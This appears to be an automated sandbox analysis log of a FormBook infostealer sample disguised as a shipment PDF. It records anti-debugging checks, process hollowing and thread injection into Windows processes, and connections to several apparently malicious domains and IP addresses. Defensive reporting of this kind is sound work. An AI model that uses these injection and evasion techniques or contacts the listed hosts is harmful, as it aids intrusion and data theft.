Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA740D mov eax, dword ptr fs:[00000030h]	17_2_00AA740D
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA740D mov eax, dword ptr fs:[00000030h]	17_2_00AA740D
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A91C06 mov eax, dword ptr fs:[00000030h]	17_2_00A91C06
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A91C06 mov eax, dword ptr fs:[00000030h]	17_2_00A91C06
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A91C06 mov eax, dword ptr fs:[00000030h]	17_2_00A91C06
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A91C06 mov eax, dword ptr fs:[00000030h]	17_2_00A91C06
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A91C06 mov eax, dword ptr fs:[00000030h]	17_2_00A91C06
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A91C06 mov eax, dword ptr fs:[00000030h]	17_2_00A91C06
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A91C06 mov eax, dword ptr fs:[00000030h]	17_2_00A91C06
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A91C06 mov eax, dword ptr fs:[00000030h]	17_2_00A91C06
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A91C06 mov eax, dword ptr fs:[00000030h]	17_2_00A91C06
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A91C06 mov eax, dword ptr fs:[00000030h]	17_2_00A91C06
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A91C06 mov eax, dword ptr fs:[00000030h]	17_2_00A91C06
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A91C06 mov eax, dword ptr fs:[00000030h]	17_2_00A91C06
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A91C06 mov eax, dword ptr fs:[00000030h]	17_2_00A91C06
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A91C06 mov eax, dword ptr fs:[00000030h]	17_2_00A91C06
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A56C0A mov eax, dword ptr fs:[00000030h]	17_2_00A56C0A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A56C0A mov eax, dword ptr fs:[00000030h]	17_2_00A56C0A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A56C0A mov eax, dword ptr fs:[00000030h]	17_2_00A56C0A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A56C0A mov eax, dword ptr fs:[00000030h]	17_2_00A56C0A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0A44B mov eax, dword ptr fs:[00000030h]	17_2_00A0A44B
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009F746D mov eax, dword ptr fs:[00000030h]	17_2_009F746D
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A6C450 mov eax, dword ptr fs:[00000030h]	17_2_00A6C450
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A6C450 mov eax, dword ptr fs:[00000030h]	17_2_00A6C450
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A035A1 mov eax, dword ptr fs:[00000030h]	17_2_00A035A1
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA05AC mov eax, dword ptr fs:[00000030h]	17_2_00AA05AC
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA05AC mov eax, dword ptr fs:[00000030h]	17_2_00AA05AC
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A01DB5 mov eax, dword ptr fs:[00000030h]	17_2_00A01DB5
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A01DB5 mov eax, dword ptr fs:[00000030h]	17_2_00A01DB5
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A01DB5 mov eax, dword ptr fs:[00000030h]	17_2_00A01DB5
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D2D8A mov eax, dword ptr fs:[00000030h]	17_2_009D2D8A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D2D8A mov eax, dword ptr fs:[00000030h]	17_2_009D2D8A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D2D8A mov eax, dword ptr fs:[00000030h]	17_2_009D2D8A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D2D8A mov eax, dword ptr fs:[00000030h]	17_2_009D2D8A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D2D8A mov eax, dword ptr fs:[00000030h]	17_2_009D2D8A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A02581 mov eax, dword ptr fs:[00000030h]	17_2_00A02581
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A02581 mov eax, dword ptr fs:[00000030h]	17_2_00A02581
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A02581 mov eax, dword ptr fs:[00000030h]	17_2_00A02581
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A02581 mov eax, dword ptr fs:[00000030h]	17_2_00A02581
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0FD9B mov eax, dword ptr fs:[00000030h]	17_2_00A0FD9B
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0FD9B mov eax, dword ptr fs:[00000030h]	17_2_00A0FD9B
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A9FDE2 mov eax, dword ptr fs:[00000030h]	17_2_00A9FDE2
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A9FDE2 mov eax, dword ptr fs:[00000030h]	17_2_00A9FDE2
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A9FDE2 mov eax, dword ptr fs:[00000030h]	17_2_00A9FDE2
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A9FDE2 mov eax, dword ptr fs:[00000030h]	17_2_00A9FDE2
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A88DF1 mov eax, dword ptr fs:[00000030h]	17_2_00A88DF1
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A56DC9 mov eax, dword ptr fs:[00000030h]	17_2_00A56DC9
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A56DC9 mov eax, dword ptr fs:[00000030h]	17_2_00A56DC9
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A56DC9 mov eax, dword ptr fs:[00000030h]	17_2_00A56DC9
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A56DC9 mov ecx, dword ptr fs:[00000030h]	17_2_00A56DC9
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A56DC9 mov eax, dword ptr fs:[00000030h]	17_2_00A56DC9
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A56DC9 mov eax, dword ptr fs:[00000030h]	17_2_00A56DC9
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009ED5E0 mov eax, dword ptr fs:[00000030h]	17_2_009ED5E0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009ED5E0 mov eax, dword ptr fs:[00000030h]	17_2_009ED5E0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A9E539 mov eax, dword ptr fs:[00000030h]	17_2_00A9E539
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A5A537 mov eax, dword ptr fs:[00000030h]	17_2_00A5A537
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A04D3B mov eax, dword ptr fs:[00000030h]	17_2_00A04D3B
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A04D3B mov eax, dword ptr fs:[00000030h]	17_2_00A04D3B
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A04D3B mov eax, dword ptr fs:[00000030h]	17_2_00A04D3B
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA8D34 mov eax, dword ptr fs:[00000030h]	17_2_00AA8D34
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E3D34 mov eax, dword ptr fs:[00000030h]	17_2_009E3D34
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E3D34 mov eax, dword ptr fs:[00000030h]	17_2_009E3D34
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E3D34 mov eax, dword ptr fs:[00000030h]	17_2_009E3D34
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E3D34 mov eax, dword ptr fs:[00000030h]	17_2_009E3D34
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E3D34 mov eax, dword ptr fs:[00000030h]	17_2_009E3D34
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E3D34 mov eax, dword ptr fs:[00000030h]	17_2_009E3D34
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E3D34 mov eax, dword ptr fs:[00000030h]	17_2_009E3D34
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E3D34 mov eax, dword ptr fs:[00000030h]	17_2_009E3D34
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E3D34 mov eax, dword ptr fs:[00000030h]	17_2_009E3D34
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E3D34 mov eax, dword ptr fs:[00000030h]	17_2_009E3D34
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E3D34 mov eax, dword ptr fs:[00000030h]	17_2_009E3D34
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E3D34 mov eax, dword ptr fs:[00000030h]	17_2_009E3D34
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E3D34 mov eax, dword ptr fs:[00000030h]	17_2_009E3D34
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009DAD30 mov eax, dword ptr fs:[00000030h]	17_2_009DAD30
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009F7D50 mov eax, dword ptr fs:[00000030h]	17_2_009F7D50
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A13D43 mov eax, dword ptr fs:[00000030h]	17_2_00A13D43
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A53540 mov eax, dword ptr fs:[00000030h]	17_2_00A53540
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009FC577 mov eax, dword ptr fs:[00000030h]	17_2_009FC577
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009FC577 mov eax, dword ptr fs:[00000030h]	17_2_009FC577
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A546A7 mov eax, dword ptr fs:[00000030h]	17_2_00A546A7
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA0EA5 mov eax, dword ptr fs:[00000030h]	17_2_00AA0EA5
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA0EA5 mov eax, dword ptr fs:[00000030h]	17_2_00AA0EA5
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA0EA5 mov eax, dword ptr fs:[00000030h]	17_2_00AA0EA5
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A6FE87 mov eax, dword ptr fs:[00000030h]	17_2_00A6FE87
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A016E0 mov ecx, dword ptr fs:[00000030h]	17_2_00A016E0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A18EC7 mov eax, dword ptr fs:[00000030h]	17_2_00A18EC7
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A8FEC0 mov eax, dword ptr fs:[00000030h]	17_2_00A8FEC0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A036CC mov eax, dword ptr fs:[00000030h]	17_2_00A036CC
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA8ED6 mov eax, dword ptr fs:[00000030h]	17_2_00AA8ED6
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E76E2 mov eax, dword ptr fs:[00000030h]	17_2_009E76E2
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A8FE3F mov eax, dword ptr fs:[00000030h]	17_2_00A8FE3F
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009DC600 mov eax, dword ptr fs:[00000030h]	17_2_009DC600
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009DC600 mov eax, dword ptr fs:[00000030h]	17_2_009DC600
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009DC600 mov eax, dword ptr fs:[00000030h]	17_2_009DC600
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A08E00 mov eax, dword ptr fs:[00000030h]	17_2_00A08E00
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A91608 mov eax, dword ptr fs:[00000030h]	17_2_00A91608
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0A61C mov eax, dword ptr fs:[00000030h]	17_2_00A0A61C
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0A61C mov eax, dword ptr fs:[00000030h]	17_2_00A0A61C
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009DE620 mov eax, dword ptr fs:[00000030h]	17_2_009DE620
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E7E41 mov eax, dword ptr fs:[00000030h]	17_2_009E7E41
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E7E41 mov eax, dword ptr fs:[00000030h]	17_2_009E7E41
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E7E41 mov eax, dword ptr fs:[00000030h]	17_2_009E7E41
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E7E41 mov eax, dword ptr fs:[00000030h]	17_2_009E7E41
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E7E41 mov eax, dword ptr fs:[00000030h]	17_2_009E7E41
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E7E41 mov eax, dword ptr fs:[00000030h]	17_2_009E7E41
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009FAE73 mov eax, dword ptr fs:[00000030h]	17_2_009FAE73
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009FAE73 mov eax, dword ptr fs:[00000030h]	17_2_009FAE73
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009FAE73 mov eax, dword ptr fs:[00000030h]	17_2_009FAE73
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009FAE73 mov eax, dword ptr fs:[00000030h]	17_2_009FAE73
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009FAE73 mov eax, dword ptr fs:[00000030h]	17_2_009FAE73
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A9AE44 mov eax, dword ptr fs:[00000030h]	17_2_00A9AE44
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A9AE44 mov eax, dword ptr fs:[00000030h]	17_2_00A9AE44
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E766D mov eax, dword ptr fs:[00000030h]	17_2_009E766D
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E8794 mov eax, dword ptr fs:[00000030h]	17_2_009E8794
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A57794 mov eax, dword ptr fs:[00000030h]	17_2_00A57794
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A57794 mov eax, dword ptr fs:[00000030h]	17_2_00A57794
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A57794 mov eax, dword ptr fs:[00000030h]	17_2_00A57794
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A137F5 mov eax, dword ptr fs:[00000030h]	17_2_00A137F5
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009FF716 mov eax, dword ptr fs:[00000030h]	17_2_009FF716
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0E730 mov eax, dword ptr fs:[00000030h]	17_2_00A0E730
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA070D mov eax, dword ptr fs:[00000030h]	17_2_00AA070D
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA070D mov eax, dword ptr fs:[00000030h]	17_2_00AA070D
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0A70E mov eax, dword ptr fs:[00000030h]	17_2_00A0A70E
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0A70E mov eax, dword ptr fs:[00000030h]	17_2_00A0A70E
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D4F2E mov eax, dword ptr fs:[00000030h]	17_2_009D4F2E
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D4F2E mov eax, dword ptr fs:[00000030h]	17_2_009D4F2E
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A6FF10 mov eax, dword ptr fs:[00000030h]	17_2_00A6FF10
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A6FF10 mov eax, dword ptr fs:[00000030h]	17_2_00A6FF10
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA8F6A mov eax, dword ptr fs:[00000030h]	17_2_00AA8F6A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009EEF40 mov eax, dword ptr fs:[00000030h]	17_2_009EEF40
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009EFF60 mov eax, dword ptr fs:[00000030h]	17_2_009EFF60

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe

Code function: 11_2_00409B40 LdrLoadDll,

11_2_00409B40

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.goodtasteonline.com
Source: C:\Windows\explorer.exe	Domain query: www.thesidehustler.net
Source: C:\Windows\explorer.exe	Network Connect: 37.123.118.150 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 213.186.33.5 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.mmfaccao.com
Source: C:\Windows\explorer.exe	Domain query: www.lnvietnam.online
Source: C:\Windows\explorer.exe	Network Connect: 3.64.163.50 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 35.209.104.90 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.223.115.185 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.blttsperma.quest
Source: C:\Windows\explorer.exe	Domain query: www.bombers.xyz
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.jkformationfrance.com
Source: C:\Windows\explorer.exe	Domain query: www.alltart.com

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Section unmapped: C:\Windows\SysWOW64\netsh.exe base address: 11F0000	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Section unmapped: C:\Windows\SysWOW64\svchost.exe base address: 1A0000	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Section unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 1070000	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Memory written: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Memory written: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Memory written: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe base: 400000 value starts with: 4D5A	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Thread register set: target process: 3472	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Thread register set: target process: 3472	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Thread register set: target process: 3472	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Thread register set: target process: 3472	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Thread register set: target process: 3472	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Process created: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Process created: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Process created: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Jump to behavior

Source: explorer.exe, 0000000D.00000000.336648203.0000000005EA0000.00000004.00000001.sdmp, netsh.exe, 00000014.00000002.539446566.0000000005F60000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000D.00000000.326395686.0000000001640000.00000002.00020000.sdmp, netsh.exe, 00000014.00000002.539446566.0000000005F60000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000D.00000000.326395686.0000000001640000.00000002.00020000.sdmp, netsh.exe, 00000014.00000002.539446566.0000000005F60000.00000002.00020000.sdmp	Binary or memory string: SProgram Managerl
Source: explorer.exe, 0000000D.00000000.325394802.0000000001128000.00000004.00000020.sdmp	Binary or memory string: ProgmanOMEa
Source: explorer.exe, 0000000D.00000000.326395686.0000000001640000.00000002.00020000.sdmp, netsh.exe, 00000014.00000002.539446566.0000000005F60000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 0000000D.00000000.326395686.0000000001640000.00000002.00020000.sdmp, netsh.exe, 00000014.00000002.539446566.0000000005F60000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

Stealing of Sensitive Information:

Yara detected FormBook

Source: Yara match	File source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
